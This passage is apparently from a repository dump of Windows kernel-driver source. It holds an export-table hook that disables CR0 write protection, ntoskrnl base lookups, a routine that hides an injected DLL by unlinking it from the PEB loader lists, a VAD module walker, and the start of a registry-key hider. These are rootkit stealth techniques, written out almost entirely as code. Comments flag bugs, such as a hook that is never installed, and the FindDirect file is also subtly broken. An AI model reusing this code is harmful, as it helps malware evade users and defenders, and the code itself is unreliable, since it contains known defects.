} /* CR0.WP cleared with interrupts off on this CPU only — other processors are unaffected, so the cli/sti window is not a real exclusion */ 113 | DbgPrint("PsGetCurrentProcessId : %08x\n", addr); 114 | pAddressOfFunction[index] = (DWORD)NewFunction - base; /* RVA written into the export table; only callers that resolve the export after this point are redirected, already-bound imports keep the original */ 115 | old = addr; 116 | _asm 117 | { 118 | cli; 119 | mov eax, cr0; 120 | or eax, 10000h; 121 | mov cr0, eax; 122 | sti; 123 | } 124 | } else 125 | { 126 | _asm 127 | { 128 | cli; 129 | mov eax, cr0; 130 | and eax, not 10000h; 131 | mov cr0, eax; 132 | sti; 133 | } 134 | pAddressOfFunction[index] = (DWORD)old - base; /* when old is still 0 (Hook(0) before any Hook(1), as DriverEntry below does) this stores a bogus RVA */ 135 | _asm 136 | { 137 | cli; 138 | mov eax, cr0; 139 | or eax, 10000h; 140 | mov cr0, eax; 141 | sti; 142 | } 143 | } 144 | } 145 | 146 | /* Restores the export and reports the hit counter. */ VOID Unload(PDRIVER_OBJECT driver) 147 | { 148 | Hook(0); 149 | DbgPrint("Unload!\n"); 150 | DbgPrint("PsGetCurrentProcessId called %d times\n", count); 151 | } 152 | 153 | NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING szReg) 154 | { 155 | Hook(0); /* presumably meant Hook(1); as written DriverEntry "unhooks" with old == 0 and Unload repeats it */ 156 | 
DbgPrint("DriverEntry!\n"); 157 | driver->DriverUnload = Unload; 158 | return STATUS_SUCCESS; 159 | } 160 | -------------------------------------------------------------------------------- /EAT Hook/main.h: -------------------------------------------------------------------------------- 1 | #ifndef _MAIN_H /* identifiers beginning with _ + uppercase are reserved for the implementation */ 2 | #define _MAIN_H 3 | 4 | typedef unsigned short WORD; 5 | typedef unsigned char BYTE; 6 | typedef unsigned long DWORD; 7 | typedef WORD* PWORD; 8 | typedef DWORD* PDWORD; 9 | typedef BYTE* PBYTE; /* redeclared later in this header (line 213) with the same type */ 10 | 11 | 12 | /* Hand-copied SYSTEM_INFORMATION_CLASS, same numbering as CloseMyHandle/main.c; main.c uses SystemModuleInformation (11). */ typedef enum _SYSTEM_INFORMATION_CLASS { 13 | SystemBasicInformation, // 0 Y N 14 | SystemProcessorInformation, // 1 Y N 15 | SystemPerformanceInformation, // 2 Y N 16 | SystemTimeOfDayInformation, // 3 Y N 17 | SystemNotImplemented1, // 4 Y N 18 | SystemProcessesAndThreadsInformation, // 5 Y N 19 | SystemCallCounts, // 6 Y N 20 | SystemConfigurationInformation, // 7 Y N 21 | SystemProcessorTimes, // 8 Y N 22 | SystemGlobalFlag, // 9 Y Y 23 | SystemNotImplemented2, // 10 Y N 24 | SystemModuleInformation, // 11 Y N 25 | SystemLockInformation, // 12 Y N 26 | SystemNotImplemented3, // 13 Y N 27 | SystemNotImplemented4, // 14 Y N 28 | SystemNotImplemented5, // 15 Y N 29 | SystemHandleInformation, // 16 Y N 30 | SystemObjectInformation, // 17 Y N 31 | SystemPagefileInformation, // 18 Y N 32 | SystemInstructionEmulationCounts, // 19 Y N 33 | SystemInvalidInfoClass1, // 20 34 | SystemCacheInformation, // 21 Y Y 35 | SystemPoolTagInformation, // 22 Y N 36 | SystemProcessorStatistics, // 23 Y N 37 | SystemDpcInformation, // 24 Y Y 38 | SystemNotImplemented6, // 25 Y N 39 | SystemLoadImage, // 26 N Y 40 | SystemUnloadImage, // 27 N Y 41 | SystemTimeAdjustment, // 28 Y Y 42 | SystemNotImplemented7, // 29 Y N 43 | SystemNotImplemented8, // 30 Y N 44 | SystemNotImplemented9, // 31 Y N 45 | SystemCrashDumpInformation, // 32 Y N 46 | SystemExceptionInformation, // 33 Y N 47 | SystemCrashDumpStateInformation, // 34 Y Y/N 48 | SystemKernelDebuggerInformation, // 35 Y N 
49 | SystemContextSwitchInformation, // 36 Y N 50 | SystemRegistryQuotaInformation, // 37 Y Y 51 | SystemLoadAndCallImage, // 38 N Y 52 | SystemPrioritySeparation, // 39 N Y 53 | SystemNotImplemented10, // 40 Y N 54 | SystemNotImplemented11, // 41 Y N 55 | SystemInvalidInfoClass2, // 42 56 | SystemInvalidInfoClass3, // 43 57 | SystemTimeZoneInformation, // 44 Y N 58 | SystemLookasideInformation, // 45 Y N 59 | SystemSetTimeSlipEvent, // 46 N Y 60 | SystemCreateSession, // 47 N Y 61 | SystemDeleteSession, // 48 N Y 62 | SystemInvalidInfoClass4, // 49 63 | SystemRangeStartInformation, // 50 Y N 64 | SystemVerifierInformation, // 51 Y Y 65 | SystemAddVerifier, // 52 N Y 66 | SystemSessionProcessesInformation // 53 Y N 67 | } SYSTEM_INFORMATION_CLASS; 68 | 69 | /* Prototype for the ntoskrnl export used by GetModuleBaseAddress in main.c. */ NTSYSAPI 70 | NTSTATUS 71 | NTAPI 72 | ZwQuerySystemInformation( 73 | IN SYSTEM_INFORMATION_CLASS SystemInformationClass, 74 | IN OUT PVOID SystemInformation, 75 | IN ULONG SystemInformationLength, 76 | OUT PULONG ReturnLength OPTIONAL 77 | ); 78 | 79 | /* Reserved[2] covers the Section/MappedBase pair spelled out in GetNtoskrnlexe/ByZwQuerySystemInformation.c; same 284-byte 32-bit layout. ImageName + ModuleNameOffset is the bare file name; main.c does not check that the offset stays inside the 256-byte array. */ typedef struct _SYSTEM_MODULE_INFORMATION { // Information Class 11 80 | ULONG Reserved[2]; 81 | PVOID Base; 82 | ULONG Size; 83 | ULONG Flags; 84 | USHORT Index; 85 | USHORT Unknown; 86 | USHORT LoadCount; 87 | USHORT ModuleNameOffset; 88 | CHAR ImageName[256]; 89 | } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; 90 | 91 | /* PE headers as in winnt.h; main.c reads only e_lfanew from this one. */ typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header 92 | WORD e_magic; // Magic number 93 | WORD e_cblp; // Bytes on last page of file 94 | WORD e_cp; // Pages in file 95 | WORD e_crlc; // Relocations 96 | WORD e_cparhdr; // Size of header in paragraphs 97 | WORD e_minalloc; // Minimum extra paragraphs needed 98 | WORD e_maxalloc; // Maximum extra paragraphs needed 99 | WORD e_ss; // Initial (relative) SS value 100 | WORD e_sp; // Initial SP value 101 | WORD e_csum; // Checksum 102 | WORD e_ip; // Initial IP value 103 | WORD e_cs; // Initial (relative) CS value 104 | WORD e_lfarlc; // File address of relocation table 105 | WORD 
e_ovno; // Overlay number 106 | WORD e_res[4]; // Reserved words 107 | WORD e_oemid; // OEM identifier (for e_oeminfo) 108 | WORD e_oeminfo; // OEM information; e_oemid specific 109 | WORD e_res2[10]; // Reserved words 110 | LONG e_lfanew; // File address of new exe header 111 | } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER; 112 | 113 | 114 | /* RVA/size pair; DataDirectory[0] is the export directory that Hook() in main.c walks. */ typedef struct _IMAGE_DATA_DIRECTORY { 115 | DWORD VirtualAddress; 116 | DWORD Size; 117 | } IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY; 118 | #define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16 119 | 120 | /* PE32 (32-bit) optional header. */ typedef struct _IMAGE_OPTIONAL_HEADER { 121 | // 122 | // Standard fields. 123 | // 124 | 125 | WORD Magic; 126 | BYTE MajorLinkerVersion; 127 | BYTE MinorLinkerVersion; 128 | DWORD SizeOfCode; 129 | DWORD SizeOfInitializedData; 130 | DWORD SizeOfUninitializedData; 131 | DWORD AddressOfEntryPoint; 132 | DWORD BaseOfCode; 133 | DWORD BaseOfData; 134 | 135 | // 136 | // NT additional fields. 137 | // 138 | 139 | DWORD ImageBase; 140 | DWORD SectionAlignment; 141 | DWORD FileAlignment; 142 | WORD MajorOperatingSystemVersion; 143 | WORD MinorOperatingSystemVersion; 144 | WORD MajorImageVersion; 145 | WORD MinorImageVersion; 146 | WORD MajorSubsystemVersion; 147 | WORD MinorSubsystemVersion; 148 | DWORD Win32VersionValue; 149 | DWORD SizeOfImage; 150 | DWORD SizeOfHeaders; 151 | DWORD CheckSum; 152 | WORD Subsystem; 153 | WORD DllCharacteristics; 154 | DWORD SizeOfStackReserve; 155 | DWORD SizeOfStackCommit; 156 | DWORD SizeOfHeapReserve; 157 | DWORD SizeOfHeapCommit; 158 | DWORD LoaderFlags; 159 | DWORD NumberOfRvaAndSizes; 160 | IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; 161 | } IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32; 162 | 163 | typedef IMAGE_OPTIONAL_HEADER32 IMAGE_OPTIONAL_HEADER; 164 | typedef PIMAGE_OPTIONAL_HEADER32 PIMAGE_OPTIONAL_HEADER; 165 | 166 | /* Import thunk; not referenced by main.c. */ typedef struct _IMAGE_THUNK_DATA32 { 167 | union { 168 | DWORD ForwarderString; // PBYTE 169 | DWORD Function; // PDWORD 170 | DWORD Ordinal; 171 
| DWORD AddressOfData; // PIMAGE_IMPORT_BY_NAME 172 | } u1; 173 | } IMAGE_THUNK_DATA32; 174 | typedef IMAGE_THUNK_DATA32 * PIMAGE_THUNK_DATA32; 175 | typedef IMAGE_THUNK_DATA32 IMAGE_THUNK_DATA; 176 | typedef PIMAGE_THUNK_DATA32 PIMAGE_THUNK_DATA; 177 | 178 | /* Import descriptor; not referenced by main.c. */ typedef struct _IMAGE_IMPORT_DESCRIPTOR { 179 | union { 180 | DWORD Characteristics; // 0 for terminating null import descriptor 181 | DWORD OriginalFirstThunk; // RVA to original unbound IAT (PIMAGE_THUNK_DATA) 182 | }; 183 | DWORD TimeDateStamp; // 0 if not bound, 184 | // -1 if bound, and real date\time stamp 185 | // in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND) 186 | // O.W. date/time stamp of DLL bound to (Old BIND) 187 | 188 | DWORD ForwarderChain; // -1 if no forwarders 189 | DWORD Name; 190 | DWORD FirstThunk; // RVA to IAT (if bound this IAT has actual addresses) 191 | } IMAGE_IMPORT_DESCRIPTOR; 192 | typedef IMAGE_IMPORT_DESCRIPTOR UNALIGNED *PIMAGE_IMPORT_DESCRIPTOR; 193 | 194 | 195 | /* Export directory. Name i resolves to AddressOfFunctions[AddressOfNameOrdinals[i]]; Hook() in main.c indexes AddressOfFunctions by i directly instead. */ typedef struct _IMAGE_EXPORT_DIRECTORY { 196 | DWORD Characteristics; 197 | DWORD TimeDateStamp; 198 | WORD MajorVersion; 199 | WORD MinorVersion; 200 | DWORD Name; 201 | DWORD Base; 202 | DWORD NumberOfFunctions; 203 | DWORD NumberOfNames; 204 | DWORD AddressOfFunctions; // RVA from base of image 205 | DWORD AddressOfNames; // RVA from base of image 206 | DWORD AddressOfNameOrdinals; // RVA from base of image 207 | } IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY; 208 | 209 | 210 | #define IMAGE_DIRECTORY_ENTRY_IMPORT 1 // Import Directory 211 | #define IMAGE_DIRECTORY_ENTRY_EXPORT 0 212 | 213 | typedef unsigned char *PBYTE; /* duplicate of the PBYTE typedef at the top of this header (same type) */ 214 | 215 | /* Unrelated to PE parsing; not referenced by main.c. */ typedef struct _GENERATE_NAME_CONTEXT { 216 | USHORT Checksum; 217 | BOOLEAN CheckSumInserted; 218 | UCHAR NameLength; 219 | WCHAR NameBuffer[8]; 220 | ULONG ExtensionLength; 221 | WCHAR ExtensionBuffer[4]; 222 | ULONG LastIndexValue; 223 | } GENERATE_NAME_CONTEXT, *PGENERATE_NAME_CONTEXT; 224 | 225 | 226 | typedef struct _IMAGE_FILE_HEADER { 227 | WORD Machine; 228 | WORD 
NumberOfSections; 229 | DWORD TimeDateStamp; 230 | DWORD PointerToSymbolTable; 231 | DWORD NumberOfSymbols; 232 | WORD SizeOfOptionalHeader; 233 | WORD Characteristics; 234 | } IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER; 235 | 236 | /* Section-object declarations below are not used by EAT Hook/main.c. */ #define SEC_IMAGE 0x01000000 237 | #define SEC_BASED 0x00200000 238 | typedef struct _SECTION_IMAGE_INFORMATION { 239 | PVOID EntryPoint; 240 | ULONG StackZeroBits; 241 | ULONG StackReserved; 242 | ULONG StackCommit; 243 | ULONG ImageSubsystem; 244 | WORD SubsystemVersionLow; 245 | WORD SubsystemVersionHigh; 246 | ULONG Unknown1; 247 | ULONG ImageCharacteristics; 248 | ULONG ImageMachineType; 249 | ULONG Unknown2[3]; 250 | } SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION; 251 | 252 | 253 | NTSYSAPI 254 | NTSTATUS 255 | NTAPI 256 | ZwCreateSection( 257 | OUT PHANDLE SectionHandle, 258 | IN ACCESS_MASK DesiredAccess, 259 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 260 | IN PLARGE_INTEGER MaximumSize OPTIONAL, 261 | IN ULONG SectionPageProtection, 262 | IN ULONG AllocationAttributes, 263 | IN HANDLE FileHandle OPTIONAL 264 | ); 265 | 266 | #endif 267 | -------------------------------------------------------------------------------- /EAT Hook/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. 
This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /EAT Hook/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=EDTHook 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=main.c 14 | -------------------------------------------------------------------------------- /GetNtoskrnlexe/ByZwQuerySystemInformation.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | #include "windef.h" 3 | 4 | /* Public-style SYSTEM_INFORMATION_CLASS names (values in declaration order); SystemModuleInformation is 11, the only class this file uses. */ typedef enum _SYSTEM_INFORMATION_CLASS { 5 | SystemBasicInformation, 6 | SystemProcessorInformation, 7 | SystemPerformanceInformation, 8 | SystemTimeOfDayInformation, 9 | SystemPathInformation, 10 | SystemProcessInformation, 11 | SystemCallCountInformation, 12 | SystemDeviceInformation, 13 | SystemProcessorPerformanceInformation, 14 | SystemFlagsInformation, 15 | SystemCallTimeInformation, 16 | SystemModuleInformation, 17 | SystemLocksInformation, 18 | SystemStackTraceInformation, 19 | SystemPagedPoolInformation, 20 | SystemNonPagedPoolInformation, 21 | SystemHandleInformation, 22 | SystemObjectInformation, 23 | SystemPageFileInformation, 24 | SystemVdmInstemulInformation, 25 | SystemVdmBopInformation, 26 | SystemFileCacheInformation, 27 | SystemPoolTagInformation, 28 | SystemInterruptInformation, 29 | SystemDpcBehaviorInformation, 30 | SystemFullMemoryInformation, 31 | SystemLoadGdiDriverInformation, 32 | SystemUnloadGdiDriverInformation, 33 | SystemTimeAdjustmentInformation, 34 | SystemSummaryMemoryInformation, 35 | SystemNextEventIdInformation, 36 | SystemEventIdsInformation, 37 | SystemCrashDumpInformation, 38 
| SystemExceptionInformation, 39 | SystemCrashDumpStateInformation, 40 | SystemKernelDebuggerInformation, 41 | SystemContextSwitchInformation, 42 | SystemRegistryQuotaInformation, 43 | SystemExtendServiceTableInformation, 44 | SystemPrioritySeperation, 45 | SystemPlugPlayBusInformation, 46 | SystemDockInformation, 47 | SystemPowerInformation2, 48 | SystemProcessorSpeedInformation, 49 | SystemCurrentTimeZoneInformation, 50 | SystemLookasideInformation 51 | } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; 52 | 53 | typedef struct _SYSTEM_MODULE_INFORMATION 54 | { 55 | HANDLE Section; 56 | PVOID MappedBase; 57 | PVOID Base; 58 | ULONG Size; 59 | ULONG Flags; 60 | USHORT Index; 61 | USHORT Unknown; 62 | USHORT LoadCount; 63 | USHORT ModuleNameOffset; 64 | CHAR ImageName[256]; 65 | } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; 66 | 67 | typedef struct _SysModuleList 68 | { 69 | ULONG Count; 70 | SYSTEM_MODULE_INFORMATION smi[1]; 71 | } SystemModuleList, *PSystemModuleList; 72 | 73 | NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation( 74 | IN SYSTEM_INFORMATION_CLASS SystemInformationClass, 75 | IN PVOID SystemInformation, 76 | IN ULONG SystemInformationLength, 77 | OUT PULONG ReturnLength); 78 | 79 | void GetBaseImageOfNtoskrnl() 80 | { 81 | ULONG length = 0, i; 82 | PSystemModuleList info = NULL; 83 | PSYSTEM_MODULE_INFORMATION modules; 84 | ZwQuerySystemInformation(SystemModuleInformation, NULL, 0, &length); 85 | if (length == 0) 86 | { 87 | DbgPrint("Get length error!\n"); 88 | return; 89 | } 90 | info = ExAllocatePool(NonPagedPool, length); 91 | if (info == NULL) 92 | { 93 | DbgPrint("ExAllocatePool error!\n"); 94 | return; 95 | } 96 | ZwQuerySystemInformation(SystemModuleInformation, info, length, NULL); 97 | 98 | modules = (PSYSTEM_MODULE_INFORMATION)((PULONG)info + 1); 99 | for (i=0; iCount; i++) 100 | { 101 | DbgPrint("module name %d: %s with 0x%p offset %d\n", i, modules->ImageName, modules->Base, modules->ModuleNameOffset); 102 | modules++; 
103 | } 104 | ExFreePool(info); 105 | } 106 | 107 | void Unload(PDRIVER_OBJECT driver) 108 | { 109 | DbgPrint("Unload!\n"); 110 | } 111 | 112 | NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING szReg) 113 | { 114 | DbgPrint("DriverEntry!\n"); 115 | 116 | GetBaseImageOfNtoskrnl(); 117 | driver->DriverUnload = Unload; 118 | return STATUS_SUCCESS; 119 | } -------------------------------------------------------------------------------- /GetNtoskrnlexe/FindDirect.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | 3 | extern NTKERNELAPI PVOID MmSystemRangeStart; 4 | 5 | ULONG FindBase(ULONG need) 6 | { 7 | ULONG start, temp, now; 8 | __asm 9 | { 10 | mov eax,MmSystemRangeStart; 11 | mov eax,[eax]; 12 | mov eax,[eax]; 13 | mov start, eax; 14 | } 15 | if (need >= start) 16 | { 17 | need = need & (!(PAGE_SIZE - 1)); 18 | temp = (need - start) >> PAGE_SHIFT; 19 | while (temp--) 20 | { 21 | if (MmIsAddressValid(need)) 22 | { 23 | now = *(PULONG*)need; 24 | if (now == 0x00905A4D) 25 | { 26 | return now; 27 | } 28 | } 29 | need -= PAGE_SIZE; 30 | } 31 | } 32 | } 33 | 34 | void Unload(DRIVER_OBJECT driver) 35 | { 36 | DbgPrint("Unload!\n"); 37 | } 38 | 39 | NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING) 40 | { 41 | PULONG AddressOfRet; 42 | ULONG Ret = 0; 43 | 44 | DbgPrint("DriverEntry!\n"); 45 | driver->DriverUnload = Unload; 46 | 47 | __asm 48 | { 49 | lea ecx, [ebp+4]; 50 | mov AddressOfRet, ecx; 51 | } 52 | if (!MmIsAddressValid(AddressOfRet)) 53 | { 54 | DbgPrint("AddressOfRet error!\n"); 55 | return STATUS_SUCCESS; 56 | } 57 | 58 | Ret = FindBase(*AddressOfRet); 59 | 60 | if (!Ret) 61 | { 62 | DbgPrint("Cannot find base address of ntoskrnl.exe!\n"); 63 | } else 64 | { 65 | DbgPrint("Base %p\n", Ret); 66 | } 67 | return STATUS_SUCCESS; 68 | } -------------------------------------------------------------------------------- /GetNtoskrnlexe/makefile: 
-------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /GetNtoskrnlexe/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=GetNtoskrnlexe 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=ByZwQuerySystemInformation.c 14 | -------------------------------------------------------------------------------- /HideDll/HideDllInMMVAD.c: -------------------------------------------------------------------------------- 1 | VOID ShowModules(DWORD Pid) 2 | { 3 | ULONG VAD; 4 | PEPROCESS TargetProcess; 5 | PsLookupProcessByProcessId( (HANDLE)Pid,TargetProcess); 6 | if(!TargetProcess) 7 | { 8 | DbgPrint("[EnumModules] Error on Get EProcess By Pid."); 9 | return; 10 | } 11 | VAD = *(ULONG *)((ULONG)TargetProcess + VadOffset); 12 | DbgPrint("[EnumModules] EPROCESS : 0x%X , VAD : 0x%X",TargetProcess,VAD); 13 | 14 | PreOrderTraverse(VAD); 15 | DbgPrint("[EnumModules] Modules count : %d",nCount); 16 | } 17 | 18 | VOID PreOrderTraverse(ULONG mmVad) 19 | { 20 | if ( MmIsAddressValid( (ULONG *)mmVad ) ) 21 | { 22 | ShowPath(mmVad); 23 | PreOrderTraverse( *(ULONG *)(mmVad + LeftChild) ); 24 | PreOrderTraverse( *(ULONG *)(mmVad + RightChild) ); 25 | } 26 | } 27 | 28 | VOID ShowPath(ULONG mmVad) 29 | { 30 | PUNICODE_STRING pPath; 31 | ULONG ca; 32 | ULONG fp; 33 | ca = *(ULONG *)(mmVad + ControlArea); 34 | if( !MmIsAddressValid( (ULONG *)ca ) ) 35 | { 36 | DbgPrint("[EnumModules] 
ControlArea is not available : 0x%X",ca); 37 | return; 38 | } 39 | fp = *(ULONG *)(ca + FilePointer); 40 | if( !MmIsAddressValid( (ULONG *)fp ) ) 41 | { 42 | DbgPrint("[EnumModules] FileObject is not available : 0x%X",fp); 43 | return; 44 | } 45 | pPath = (PUNICODE_STRING)(fp + FileName); 46 | DbgPrint("[EnumModules] The file name is %S",pPath->Buffer); 47 | nCount++; 48 | } -------------------------------------------------------------------------------- /HideDll/main.c: -------------------------------------------------------------------------------- 1 | typedef ULONG (*pfnNtQueryInformationProcess)(); 2 | 3 | typedef struct _LDR_DATA_TABLE_ENTRY 4 | { 5 | LIST_ENTRY InLoadOrderLinks; 6 | LIST_ENTRY InMemoryOrderModuleList; 7 | LIST_ENTRY InInitializationOrderModuleList; 8 | PVOID DllBase; 9 | PVOID EntryPoint; 10 | ULONG SizeOfImage; 11 | UNICODE_STRING FullDllName; 12 | UNICODE_STRING BaseDllName; 13 | ULONG Flags; 14 | USHORT LoadCount; 15 | USHORT TlsIndex; 16 | union 17 | { 18 | LIST_ENTRY HashLinks; 19 | PVOID SectionPointer; 20 | }; 21 | ULONG CheckSum; 22 | union 23 | { 24 | ULONG TimeDateStamp; 25 | PVOID LoadedImports; 26 | }; 27 | PVOID EntryPointActivationContext; 28 | PVOID PatchInformation; 29 | } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; 30 | 31 | 32 | BOOL HideMyself() 33 | { 34 | HMODULE hMod = GetModuleHandle( _T( "ntdll.dll")); 35 | HMODULE hModMyself = GetModuleHandle( _T("dll.dll")); 36 | pfnNtQueryInformationProcess p = (pfnNtQueryInformationProcess)::GetProcAddress( hMod, "NtQueryInformationProcess"); 37 | 38 | PROCESS_BASIC_INFORMATION stInfo = {0}; 39 | DWORD dwRetnLen = 0; 40 | DWORD dw = p( GetCurrentProcess(), 0, &stInfo, sizeof(stInfo), &dwRetnLen); 41 | 42 | PPEB pPeb = stInfo.PebBaseAddress; 43 | PLIST_ENTRY ListHead, Current; 44 | PLDR_DATA_TABLE_ENTRY pstEntry = NULL; 45 | 46 | ListHead = &( stInfo.PebBaseAddress->Ldr->InLoadOrderModuleList); 47 | Current = ListHead->Flink; 48 | while ( Current != ListHead) 49 | { 50 | pstEntry 
= CONTAINING_RECORD( Current, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks); 51 | //DebugOutW( L"Module:%s, base:0x%X\r\n", pstEntry->FullDllName.Buffer, pstEntry->EntryPoint); 52 | if ( pstEntry->DllBase == hModMyself) 53 | { 54 | pstEntry->InLoadOrderLinks.Flink->Blink = pstEntry->InLoadOrderLinks.Blink; 55 | pstEntry->InLoadOrderLinks.Blink->Flink = pstEntry->InLoadOrderLinks.Flink; 56 | DebugOut( _T( "Hide injected dll.")); 57 | break; 58 | } 59 | Current = pstEntry->InLoadOrderLinks.Flink; 60 | } 61 | 62 | ListHead = &( stInfo.PebBaseAddress->Ldr->InMemoryOrderModuleList); 63 | Current = ListHead->Flink; 64 | while ( Current != ListHead) 65 | { 66 | pstEntry = CONTAINING_RECORD( Current, LDR_DATA_TABLE_ENTRY, InMemoryOrderModuleList); 67 | DebugOutW( L"Module:%s, base:0x%X\r\n", pstEntry->FullDllName.Buffer, pstEntry->EntryPoint); 68 | if ( pstEntry->DllBase == hModMyself) 69 | { 70 | pstEntry->InMemoryOrderModuleList.Flink->Blink = pstEntry->InMemoryOrderModuleList.Blink; 71 | pstEntry->InMemoryOrderModuleList.Blink->Flink = pstEntry->InMemoryOrderModuleList.Flink; 72 | DebugOut( _T( "Hide injected dll.")); 73 | break; 74 | } 75 | Current = pstEntry->InMemoryOrderModuleList.Flink; 76 | } 77 | DebugOutW( L"\r\n"); 78 | 79 | ListHead = &( stInfo.PebBaseAddress->Ldr->InInitializationOrderModuleList); 80 | Current = ListHead->Flink; 81 | while ( Current != ListHead) 82 | { 83 | pstEntry = CONTAINING_RECORD( Current, LDR_DATA_TABLE_ENTRY, InInitializationOrderModuleList); 84 | DebugOutW( L"Module:%s, base:0x%X\r\n", pstEntry->FullDllName.Buffer, pstEntry->EntryPoint); 85 | if ( pstEntry->DllBase == hModMyself) 86 | { 87 | pstEntry->InInitializationOrderModuleList.Flink->Blink = pstEntry->InInitializationOrderModuleList.Blink; 88 | pstEntry->InInitializationOrderModuleList.Blink->Flink = pstEntry->InInitializationOrderModuleList.Flink; 89 | DebugOut( _T( "Hide injected dll.")); 90 | break; 91 | } 92 | Current = pstEntry->InInitializationOrderModuleList.Flink; 93 | } 94 | 
//DebugOut( _T("Out HideMyself\r\n")); 95 | return TRUE; 96 | } -------------------------------------------------------------------------------- /HideDll/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /HideDll/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=HideDll 3 | TARGETPATH=obj 4 | TARGETTYPE= 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES= 14 | -------------------------------------------------------------------------------- /HideReg.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | 3 | #define GET_PTR(ptr, offset) \ 4 | ( *(PVOID*)( (ULONG)ptr + (offset##Offset) )) 5 | 6 | #define CM_KEY_INDEX_ROOT 0x6972 7 | #define CM_KEY_INDEX_LEAF 0x696C 8 | #define CM_KEY_FAST_LEAF 0x666C 9 | #define CM_KEY_HASH_LEAF 0x686C 10 | 11 | #pragma pack(1) 12 | typedef struct _CM_KEY_NODE { 13 | USHORT Signature; 14 | USHORT Flags; 15 | LARGE_INTEGER LastWriteTime; 16 | ULONG Spare; // used to be TitleIndex 17 | HANDLE Parent; 18 | ULONG SubKeyCounts[2]; // Stable and Volatile 19 | HANDLE SubKeyLists[2]; // Stable and Volatile 20 | // ... 
21 | } CM_KEY_NODE, *PCM_KEY_NODE; 22 | 23 | typedef struct _CM_KEY_INDEX { 24 | USHORT Signature; 25 | USHORT Count; 26 | HANDLE List[1]; 27 | } CM_KEY_INDEX, *PCM_KEY_INDEX; 28 | 29 | typedef struct _CM_KEY_BODY { 30 | ULONG Type; // "ky02" 31 | PVOID KeyControlBlock; 32 | PVOID NotifyBlock; 33 | PEPROCESS Process; // the owner process 34 | LIST_ENTRY KeyBodyList; // key_nodes using the same kcb 35 | } CM_KEY_BODY, *PCM_KEY_BODY; 36 | 37 | typedef PVOID (__stdcall *PGET_CELL_ROUTINE)(PVOID, HANDLE); 38 | 39 | typedef struct _HHIVE { 40 | ULONG Signature; 41 | PGET_CELL_ROUTINE GetCellRoutine; 42 | // ... 43 | } HHIVE, *PHHIVE; 44 | #pragma pack() 45 | 46 | WCHAR g_HideKeyName[] = L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Services\\Beep"; 47 | 48 | PGET_CELL_ROUTINE g_pGetCellRoutine = NULL; 49 | PGET_CELL_ROUTINE* g_ppGetCellRoutine = NULL; 50 | 51 | PCM_KEY_NODE g_HideNode = NULL; 52 | PCM_KEY_NODE g_LastNode = NULL; 53 | 54 | HANDLE OpenKeyByName(PCWSTR pwcsKeyName) 55 | { 56 | NTSTATUS status; 57 | UNICODE_STRING uKeyName; 58 | OBJECT_ATTRIBUTES oa; 59 | HANDLE hKey; 60 | RtlInitUnicodeString(&uKeyName, pwcsKeyName); 61 | InitializeObjectAttributes(&oa, 62 | &uKeyName, 63 | OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, 64 | NULL, 65 | NULL); 66 | status = ZwOpenKey(&hKey, KEY_READ, &oa); 67 | if (status != STATUS_SUCCESS) 68 | { 69 | DbgPrint("ZwOpenKey 